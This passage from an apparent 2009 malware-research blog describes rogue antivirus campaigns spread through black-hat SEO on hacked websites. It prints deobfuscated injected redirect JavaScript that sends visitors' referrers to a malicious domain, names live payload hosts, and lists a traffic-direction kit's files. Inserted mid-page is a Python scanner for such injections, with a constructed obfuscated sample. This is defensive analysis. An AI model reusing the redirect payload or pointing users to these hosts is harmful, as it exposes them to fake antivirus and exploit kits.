</td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/33a9dac2323aeac19dc05b98e315344f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3573bbf5777a8a912a6affb97fae9f74" target="_blank">Second Report</a></td><td> 
</td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.24.2009 16:12:30 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FraudPack.ify</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeAV.iy</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Screenshot:</b></td></tr><tr><td height="200"> </td><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CNgBb2vcFa0I3P4eg8_fq74XoNyT8yM9iqWYaQM51c_L5LqcdrVg8iauhEl7JqnSDcG-V8xkTaIoxZkqR152MFin-fVkQViCx_Arf5vtPhyWkVA4PKPGMl7Tx49Rf_AC7cl2XGJghKkK/s1600-h/AntivirusPlusSetup.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 248px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CNgBb2vcFa0I3P4eg8_fq74XoNyT8yM9iqWYaQM51c_L5LqcdrVg8iauhEl7JqnSDcG-V8xkTaIoxZkqR152MFin-fVkQViCx_Arf5vtPhyWkVA4PKPGMl7Tx49Rf_AC7cl2XGJghKkK/s320/AntivirusPlusSetup.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318791048360863842" /></a> <br /> <br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSqvI1Nz8ml1QX3O58qgu-eRvWeMQH0b2TIas6MiTDMy_aqJpznE2N27sdHu8zGmcBiZ-ZkCwrzBt-ECQ63P_jM4oHPSsaiVJ1kHMJBAytr0_nBPtM3QJq0thEzPo1y1KB9T3dnUKltkSo/s1600-h/FakeWindowsSecurityCenter-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSqvI1Nz8ml1QX3O58qgu-eRvWeMQH0b2TIas6MiTDMy_aqJpznE2N27sdHu8zGmcBiZ-ZkCwrzBt-ECQ63P_jM4oHPSsaiVJ1kHMJBAytr0_nBPtM3QJq0thEzPo1y1KB9T3dnUKltkSo/s320/FakeWindowsSecurityCenter-AntivirusPlus.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318825202907174450" /></a></td></tr></table></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-88681037223381697742009-03-28T20:15:00.000-07:002009-03-28T20:17:36.878-07:00Black Hat SEO and Rogue Antivirus p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />The World Wide Web Consortium and Rogue AV<br /></p><table width="546" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="546"><p> <u>Has your website been hacked, with injected IFRAMEs, trojans or backdoors?<br /><br />Are your pages infected with redirections to rogue antivirus/antispyware? <br /><br />
Have your pages been replaced with a World Wide Web Consortium article with some <br />obfuscated JavaScript code appended to them?</u><br /><br />This page presents some recent research on a malware campaign which has infected thousands of websites. In this campaign all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard (sometimes called WinWebSecurity or SystemSecurity2009, together with InternetAntivirusPro).<br /><br />Since July/August 2008, hundreds of thousands of pages on legitimate domains have been abused: web pages stuffed with keywords (porn, celebrities, popular snacks) were uploaded to them as a means of attracting victims via search engine results. In some cases the homepage of the compromised site is also modified, appending hidden links to the malicious web page.<br /> <br />All the evidence indicates that the attack was carried out with stolen FTP passwords, on all of these domains.<br /><br />An alarming observation is that the activity grows at an exponential rate, with ever more sophisticated malware and exploit code.<br /><br />You can find some of the IPs, networks and domains used, examples of hacked pages/websites and other malicious code injected into these domains on the links below or on other pages of this blog.<br /><br /><a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 1</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 2</a><br /> <br /> *********************<br /> <br />
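As an added example, not code from this post or from any of the sites it describes, here is a small webmaster-side scanner in Python for the appended, obfuscated JavaScript this post describes, which (as the deobfuscated code further down the post shows) sets window.location from document.referrer to bounce search-engine visitors to a rogue AV site. The scoring weights, threshold, host names and sample pages are constructed assumptions, not data from the post.

```python
"""Added example, not code from this post or the sites it describes: a webmaster-side
scanner for appended, obfuscated redirect scripts that send search-engine visitors to a
rogue AV page based on document.referrer. Weights, threshold, hosts and samples are constructed."""
import os
import re
import urllib.parse
from dataclasses import dataclass, field

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Eight or more consecutive %XX escapes: a string hidden behind unescape().
PCT_RUN_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
# Assignment of (window.)location(.href) to an absolute URL; group 1 is the host.
LOCATION_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*"
    r"(?:encodeURI\()?\s*[\"']https?://([^/\"'&?\s]+)", re.I)
SUSPICIOUS_SCORE = 5  # constructed threshold; tune for your own site

@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)
    redirect_host: str = ""

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_SCORE

def decode_layers(script: str, max_rounds: int = 3) -> str:
    """Peel %XX encoding off repeatedly so indicators hidden behind unescape() show."""
    text = script
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def score_html(html: str, own_host: str) -> Finding:
    """Score every <script> in one page; the reasons list explains what tripped."""
    finding = Finding()
    end_of_doc = html.lower().rfind("</html>")
    for m in SCRIPT_RE.finditer(html):
        raw = m.group(1)
        decoded = decode_layers(raw)
        if end_of_doc != -1 and m.start() > end_of_doc:
            finding.score += 2
            finding.reasons.append("script appended after </html>")
        if PCT_RUN_RE.search(raw) or ("eval(" in decoded and "unescape(" in decoded):
            finding.score += 2
            finding.reasons.append("obfuscated script body (eval/unescape or long %XX run)")
        loc = LOCATION_RE.search(decoded)
        if loc and "document.referrer" in decoded:
            finding.score += 3
            finding.reasons.append("redirect conditioned on document.referrer")
        if loc:
            finding.redirect_host = loc.group(1).lower()
            if finding.redirect_host != own_host.lower():
                finding.score += 2
                finding.reasons.append(f"redirect to external host {finding.redirect_host}")
        if "in.cgi?" in decoded:
            finding.score += 1
            finding.reasons.append("in.cgi traffic-director URL")
    return finding

def scan_directory(root: str, own_host: str) -> dict:
    """Walk a document root; return {path: Finding} for pages over the threshold."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = score_html(fh.read(), own_host)
                if finding.suspicious:
                    hits[path] = finding
    return hits

def hex_escape(text: str) -> str:
    """Encode every byte as %XX, as unescape()-based packers do (builds the sample only)."""
    return "".join(f"%{b:02X}" for b in text.encode())

# Constructed sample pages, not captured from any site named in the post.
CLEAN_PAGE = """<html><head><title>Widgets Inc</title>
<script type="text/javascript">var host = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + host + "analytics.example/a.js'%3E%3C/script%3E"));</script>
</head><body><p>Welcome to our site.</p></body></html>
"""
INJECTED_JS = ('window.location = encodeURI("http://redirector.example/in.cgi?7&seoref="'
               ' + encodeURIComponent(document.referrer) + "&ur=1")')
INFECTED_PAGE = (
    "<html><head><title>HTML 4.01 Specification</title></head>"
    "<body><p>Copied reference text, stuffed with keywords...</p></body></html>\n"
    f'<script>eval(unescape("{hex_escape(INJECTED_JS)}"))</script>\n'
)

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        f = score_html(page, "www.victim.example")
        print(f"{label}: score={f.score} suspicious={f.suspicious} {f.reasons}")
```

Run scan_directory against a copy of the document root taken over FTP and compare the hits against the last known-good backup; a referrer-conditional redirect never shows up when the page is opened directly, so a browser check alone will miss it.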
The screenshot below shows many websites also used in this rogue AV malware campaign, but with World Wide Web Consortium (W3C) pages uploaded to them with JavaScript code injected.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNImnbyC5w-RpFNv7UnXMwRtM3BtcG0YWc_WPLtkMHotT5YLdFj9W9Ehcuw1J0Hssu0TfI-rp6V_eK92V-FEyvc1OBIlhfa9f9eRpwO1ENLAHfr-lAhek7J6heN-VcMkXak2ys4_4azdZT/s1600-h/W3C-hack.jpg"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNImnbyC5w-RpFNv7UnXMwRtM3BtcG0YWc_WPLtkMHotT5YLdFj9W9Ehcuw1J0Hssu0TfI-rp6V_eK92V-FEyvc1OBIlhfa9f9eRpwO1ENLAHfr-lAhek7J6heN-VcMkXak2ys4_4azdZT/s320/W3C-hack.jpg" alt="" width="120" height="400" border="0" id="BLOGGER_PHOTO_ID_5318283110705578354" style="cursor:pointer; cursor:hand;width: 120px; height: 400px;" /></a><br /><br /> Source of one of these sites:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhux3mfhF1D4oV6tQnb3F9zsy-K1LnB44ue_Zcydn6Lx_uBoVwhQyflgaY6PWD-6eqDgOm8puyzi52ZG9czYFQsm-iE22KIb2YoqBOX0KSDCfC9lhdLkkVsxi27zuhey1wn62kZQHT0QgVw/s1600-h/W3C-hack2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhux3mfhF1D4oV6tQnb3F9zsy-K1LnB44ue_Zcydn6Lx_uBoVwhQyflgaY6PWD-6eqDgOm8puyzi52ZG9czYFQsm-iE22KIb2YoqBOX0KSDCfC9lhdLkkVsxi27zuhey1wn62kZQHT0QgVw/s320/W3C-hack2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318285628042963618" /></a><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjKXZe5eOHnojFDeOjeqhk2nb5G3A0oErAH1IupL50x6fwxR5Bqlmz-mbFjk9p8zOVYzrb_TEBTCH6EwUZ9RmFjlYTetsm0ZVDGSC9SwuXwWljhbQMRea8PGPde44uHV4a1V1mDjd_05nz/s1600-h/W3C-hack3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjKXZe5eOHnojFDeOjeqhk2nb5G3A0oErAH1IupL50x6fwxR5Bqlmz-mbFjk9p8zOVYzrb_TEBTCH6EwUZ9RmFjlYTetsm0ZVDGSC9SwuXwWljhbQMRea8PGPde44uHV4a1V1mDjd_05nz/s320/W3C-hack3.jpg" border="0" 
alt="" id="BLOGGER_PHOTO_ID_5318285628576165506" /></a><br /><br />In a browser:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyODoVZG9ytJxTWVQLaTi6nlrEmRMO3MHhx6P4dQfrmZjbBl5SaegdWrkfZHoE1UST1kHQ66O9oNFxeNqzt6cBFTeWG2OFroCFHsH4-4tfEymPUxj57QdyNPQ4yfwEh5NH6YE9SC9n8fCu/s1600-h/W3C-hack4.jpg"><img style="cursor:pointer; cursor:hand;width: 134px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyODoVZG9ytJxTWVQLaTi6nlrEmRMO3MHhx6P4dQfrmZjbBl5SaegdWrkfZHoE1UST1kHQ66O9oNFxeNqzt6cBFTeWG2OFroCFHsH4-4tfEymPUxj57QdyNPQ4yfwEh5NH6YE9SC9n8fCu/s320/W3C-hack4.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318287622761715586" /></a><br /><br /> Deobfuscation results:<br /><br />window.location = encodeURI(<br />"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" + <br />encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + <br />encodeURIComponent(document.URL) + "&default_keyword=XXX");<br /><br />-----------------------<br /><br />The source code also reveals thousands of hacked websites. Analysis of the JavaScript shows that it redirects to onlinedetect.com or to another domain used in this attack. <br />You can find more information on <a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html">this page</a>. <br /><br /></p></td></tr></table></td></tr></table></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-24808446418048578472009-03-28T20:11:00.000-07:002009-03-28T20:14:29.361-07:00Black Hat SEO - PDF Malware campaign<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="567" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="567" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - PDF Malware campaign</span><br /></p><br /><table width="528" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="528"><p>Earlier in March, Adobe released security updates addressing <br />vulnerabilities and exploits targeting Adobe Reader. 
Some links can be found below:<br /><br />McAfee Avert Labs: <a href="http://www.avertlabs.com/research/blog/index.php/2009/02/19/new-backdoor-attacks-using-pdf-documents/" target="_blank">New Backdoor Attacks using PDF Documents</a><br />Trend Micro Malware Blog: <a href="http://blog.trendmicro.com/portable-document-format-or-portable-malware-format/" target="_blank">Portable Document Format or Portable Malware Format?</a><br />SANS Internet Storm Center: <a href="http://isc.sans.org/diary.html?storyid=5902" target="_blank">Adobe/Acrobat 0-day in the wild?</a> <br /><br />Adobe Security Bulletin: <a href="http://www.adobe.com/support/security/advisories/apsa09-01.html" target="_blank">Buffer overflow issue</a><br /><br />Here is a complete example with screenshots, data and analysis of a website <br />used in the PDF malware campaign and hosting a malicious application called SUTRA.<br /><br />The application, also known as "Traffic Management System", is explained by <br />McAfee Avert Labs on this page: <a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/" target="_blank">Inside the malicious traffic</a><br /><br />This cybercrime toolkit is actively used to manage traffic from compromised <br />websites and redirect visitors to exploit code or other malicious URLs serving <br />fake codecs, rogue antispyware applications, keyloggers, banking trojans and more. <br /><br />Another example of a compromised website is explained <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2189" target="_blank">here</a>. <br />A screenshot of SUTRA can be found there.<br /><br />***<br /><br />Now let's take a look at another website that was used.<br /><br />The site is "salevisitor.net" 89.107.104.10 <br />[Do not enter this site unless you know what you are doing]<br /><br />The payload is located here:
"salevisitor.net/in.cgi?6" [Unstable - file not found at this time]<br /><br />Just for your information, this is the structure of files/folders for SUTRA Traffic Manager
<br /></p><table width="426" height="891" border="0" cellpadding="0" cellspacing="0" ><tr><td width="156" height="13" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td height="13" width="270" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">files</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">install</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">memory</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; 
color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">getos.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">c.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">center.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron.sh</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- 
(644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">panel.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">ub_fetcher</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin_forces.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type_new.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; 
font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">crontab_wizard.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_user.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces_view.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; 
font-size:12px;">general_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">GeoIP.dat</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">geoip.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_options.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_vars.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">import.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">key</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">login.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- 
(644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">page.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pages_navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">profile.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register_done.html</td></tr><tr><td 
valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">search.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_bottom.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_header.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_daily.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">static_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" 
